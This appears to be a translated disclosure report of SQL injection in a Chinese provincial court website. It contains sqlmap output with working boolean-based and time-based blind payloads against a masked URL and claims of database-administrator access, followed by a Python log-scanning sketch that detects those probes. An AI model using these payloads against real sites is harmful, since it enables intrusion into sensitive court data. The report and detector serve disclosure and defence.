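2015-12-28: Details reported to the vendor; awaiting vendor handling
2015-12-31: Vendor confirmed; details disclosed to the vendor only
2016-01-10: Details disclosed to core white hats and relevant domain experts
2016-01-20: Details disclosed to regular white hats
2016-01-30: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public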
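Sichuan Higher People's Court!!! sa privileges, 27 databases involved. Each database holds hundreds of tables, which contain data for the other cities and districts.
Injection point: http://**.**.**.**/ShowFunction.aspx?fybm=51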
GET parameter 'fybm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Parameter: fybm (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fybm=51' AND 4565=4565 AND 'VhfJ'='VhfJ

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: fybm=51' AND 1249=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'UBNF'='UBNF
---
[20:33:30] [INFO] testing Microsoft SQL Server
[20:33:36] [INFO] confirming Microsoft SQL Server
[20:33:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
Take a look at one of the databases:
Database: sfgk_all
Did not dig any deeper.
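Severity: High
Vulnerability Rank: 11
Confirmed: 2015-12-31 19:19
CNVD confirmed and reproduced the issue described, and has forwarded it via CNCERT to the Sichuan sub-center, which will follow up and coordinate with the organization that runs the website to handle it.
None yet.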
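A detection sketch for the two probe shapes in the sqlmap output above, as an added example that is not part of the original report: it scans IIS W3C log lines for `fybm` values that are not plain digits and labels the boolean-based and heavy-query patterns. The log lines, their field order, the assumption that `fybm` is numeric, the 5000 ms threshold and the names `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log lines, assumed field order:
# date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken(ms)
SAMPLE_LOG = """\
2015-12-28 20:31:02 GET /ShowFunction.aspx fybm=51 203.0.113.7 200 46
2015-12-28 20:32:10 GET /ShowFunction.aspx fybm=51'+AND+4565=4565+AND+'VhfJ'='VhfJ 203.0.113.9 200 51
2015-12-28 20:32:41 GET /ShowFunction.aspx fybm=51%27%20AND%201249=(SELECT%20COUNT(*)%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2,sysusers%20AS%20sys3)%20AND%20%27UBNF%27=%27UBNF 203.0.113.9 200 9875
2015-12-28 20:35:00 GET /Default.aspx - 203.0.113.7 200 12
"""

# "AND 4565=4565": a number compared with itself (boolean-based blind probe).
TAUTOLOGY = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)
# "sysusers AS sys1,sysusers AS sys2,...": a catalog table cross-joined with
# itself to burn CPU (heavy-query time-based probe).
HEAVY = re.compile(r"(?:\bsys\w+\s+AS\s+\w+\s*,\s*){2,}", re.I)


def classify(value):
    """Return findings for one decoded fybm value; an empty list means benign."""
    if re.fullmatch(r"[0-9]+", value):  # assumption: fybm is a numeric code
        return []
    findings = ["non-numeric fybm"]
    if TAUTOLOGY.search(value):
        findings.append("boolean-based blind probe")
    if HEAVY.search(value):
        findings.append("heavy-query time-based probe")
    return findings


def scan(log_text, slow_ms=5000):
    """Return (client_ip, timestamp, findings) for every suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):  # skip W3C header directives
            continue
        date, time, _method, _stem, query, ip, _status, taken = line.split()
        # parse_qs URL-decodes both '+' and %XX forms before matching.
        for value in parse_qs(query, keep_blank_values=True).get("fybm", []):
            findings = classify(value)
            if findings and int(taken) >= slow_ms:
                findings.append("slow response")
            if findings:
                alerts.append((ip, f"{date} {time}", findings))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```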